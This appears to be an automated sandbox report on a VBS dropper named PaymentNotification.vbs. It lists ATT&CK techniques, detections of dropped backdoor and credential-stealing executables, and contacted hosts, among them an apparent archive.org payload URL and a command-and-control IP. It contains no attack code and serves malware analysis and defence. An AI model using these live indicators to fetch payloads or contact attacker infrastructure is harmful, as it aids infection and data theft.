Default Accounts	Scripting121	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture11	Account Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API11	Scheduled Task/Job1	Access Token Manipulation1	Scripting121	Credentials in Registry2	File and Directory Discovery2	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Shared Modules1	Registry Run Keys / Startup Folder12	Process Injection512	Obfuscated Files or Information141	Credentials In Files1	System Information Discovery17	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Remote Access Software2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Exploitation for Client Execution1	Network Logon Script	Scheduled Task/Job1	Software Packing21	LSA Secrets	Query Registry1	SSH	Clipboard Data1	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Scheduled Task/Job1	Rc.common	Registry Run Keys / Startup Folder12	Masquerading1	Cached Domain Credentials	Security Software Discovery241	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol113	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion41	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Virtualization/Sandbox Evasion41	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection512	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	System Network Configuration Discovery1	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PaymentNotification.vbs	12%	Virustotal		Browse
PaymentNotification.vbs	17%	ReversingLabs	Script-WScript.Dropper.SDrop

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Tmp.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	100%	Avira	TR/Dropper.Gen7
C:\Users\user\AppData\Local\Temp\pgr.exe	100%	Avira	TR/Dropper.Gen7
C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\servieda.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	100%	Avira	TR/AD.MExecute.lzrac
C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	100%	Avira	SPR/Tool.MailPassView.473
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\Tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\pgr.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\servieda.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Tmp.exe	78%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Tmp.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Local\Temp\pgr.exe	91%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\pgr.exe	91%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	91%	Metadefender		Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	91%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\servieda.exe	78%	Metadefender		Browse
C:\Users\user\AppData\Roaming\servieda.exe	83%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack	100%	Avira	HEUR/AGEN.1108374	Download File
13.2.tmpFB21.tmp.exe.8a0000.0.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
13.2.tmpFB21.tmp.exe.8a0000.0.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
13.0.tmpFB21.tmp.exe.8a0000.0.unpack	100%	Avira	TR/AD.MExecute.lzrac	Download File
13.0.tmpFB21.tmp.exe.8a0000.0.unpack	100%	Avira	SPR/Tool.MailPassView.473	Download File
1.0.Tmp.exe.1d0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
12.0.tmp87E4.tmp.exe.6e0000.0.unpack	100%	Avira	HEUR/AGEN.1135787	Download File
2.2.pgr.exe.80000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
3.2.servieda.exe.a0000.0.unpack	100%	Avira	HEUR/AGEN.1108374	Download File
2.0.pgr.exe.80000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
12.2.tmp87E4.tmp.exe.6e0000.0.unpack	100%	Avira	HEUR/AGEN.1135787	Download File
3.0.servieda.exe.a0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
1.2.Tmp.exe.1d0000.0.unpack	100%	Avira	HEUR/AGEN.1108374	Download File
2.2.pgr.exe.3a3fd88.3.unpack	100%	Avira	TR/Inject.vcoldi	Download File
15.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1125438	Download File
8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
neesoontat.com.my	0%	Virustotal		Browse
81.189.14.0.in-addr.arpa	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.carterandcone.com-E	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/96	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.fontbureau.comtua	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/8	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/8	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/8	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/3	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/3	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/3	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/vno8	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/wab	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.carterandcone.comafet6	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.fontbureau.comdita	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.carterandcone.comhly#	0%	Avira URL Cloud	safe
http://www.carterandcone.comMP_	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/L	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/L	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/L	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/G	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/G	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/G	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/r	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/r	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/r	0%	URL Reputation	safe
http://www.fontbureau.comcomF	0%	URL Reputation	safe
http://www.fontbureau.comcomF	0%	URL Reputation	safe
http://www.fontbureau.comcomF	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/het	0%	Avira URL Cloud	safe
http://fontfabrik.com;	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/i	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/i	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/i	0%	URL Reputation	safe
http://www.fontbureau.comitu	0%	URL Reputation	safe
http://www.fontbureau.comitu	0%	URL Reputation	safe
http://www.fontbureau.comitu	0%	URL Reputation	safe
http://www.founder.com.cn/cn)	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/G	0%	Avira URL Cloud	safe
http://www.carterandcone.comal	0%	URL Reputation	safe
http://www.carterandcone.comal	0%	URL Reputation	safe
http://www.carterandcone.comal	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/3	0%	Avira URL Cloud	safe
185.140.53.71	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cnlw	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnm	0%	URL Reputation	safe
http://www.founder.com.cn/cnm	0%	URL Reputation	safe
http://www.founder.com.cn/cnm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/arge	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/i	0%	Avira URL Cloud	safe
http://www.carterandcone.comfacb	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnu	0%	Avira URL Cloud	safe
http://www.carterandcone.com;	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
whatismyipaddress.com	104.16.154.36	true	false		high
ia601504.us.archive.org	207.241.227.114	true	false		high
neesoontat.com.my	103.6.196.196	true	true	0%, Virustotal, Browse	unknown
81.189.14.0.in-addr.arpa	unknown	unknown	false	0%, Virustotal, Browse	unknown
mail.neesoontat.com.my	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://whatismyipaddress.com/	false		high
185.140.53.71	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.carterandcone.com-E	tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/96	tmpFB21.tmp.exe, 0000000D.00000003.496076219.0000000005AAC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comtua	tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/8	tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/3	tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/vno8	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/wab	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://whatismyipaddress.com/-	pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr	false		high
http://www.galapagosdesign.com/DPlease	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comafet6	tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.site.com/logs.php	tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c	vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	false		high
http://www.urwpp.deDPlease	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comdita	tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net/	tmpFB21.tmp.exe.2.dr	false		high
http://www.zhongyicts.com.cn	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://certificates.godaddy.com/repository/gdig2.crt0	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
http://www.carterandcone.comhly#	tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	tmp87E4.tmp.exe, 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp	false		high
http://www.carterandcone.comMP_	tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://2542116.fls.doubleclick.net/activi	vbc.exe, 0000000F.00000003.517667198.000000000210C000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/	tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.godaddy.com/gdig2s1-1597.crl0	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
http://certs.godaddy.com/repository/1301	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/L	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.co	vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/G	tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://certs.godaddy.com/repository/0	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736	vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.godaddy.com/gdroot-g2.crl0F	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
http://crl.godaddy.com/gdroot-g2.crl0=w	wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/frere-jones.html	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/r	tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comcomF	tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/het	tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://fontfabrik.com;	tmpFB21.tmp.exe, 0000000D.00000003.493276632.0000000005AA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.jiyu-kobo.co.jp/i	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comitu	tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn)	tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/G	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://certificates.godaddy.com/repository/0	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers?	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.carterandcone.comal	tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tiro.com	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/3	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.com	tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629	vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	false		high
http://fontfabrik.com	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnlw	tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnm	tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/arge	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/i	tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comfacb	tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnu	tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.com;	tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://login.yahoo.com/config/login	tmpFB21.tmp.exe	false		high
http://www.fonts.com	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.de	tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&	vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htmQK	tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmp	false		high
https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt3u	wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comF	tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0et	tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/udi	tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comessed8	tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ia601504.us.archive.org/3	wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/r	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/S	tmpFB21.tmp.exe, 0000000D.00000003.494591560.0000000005AA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.coma	tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comTTFd	tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
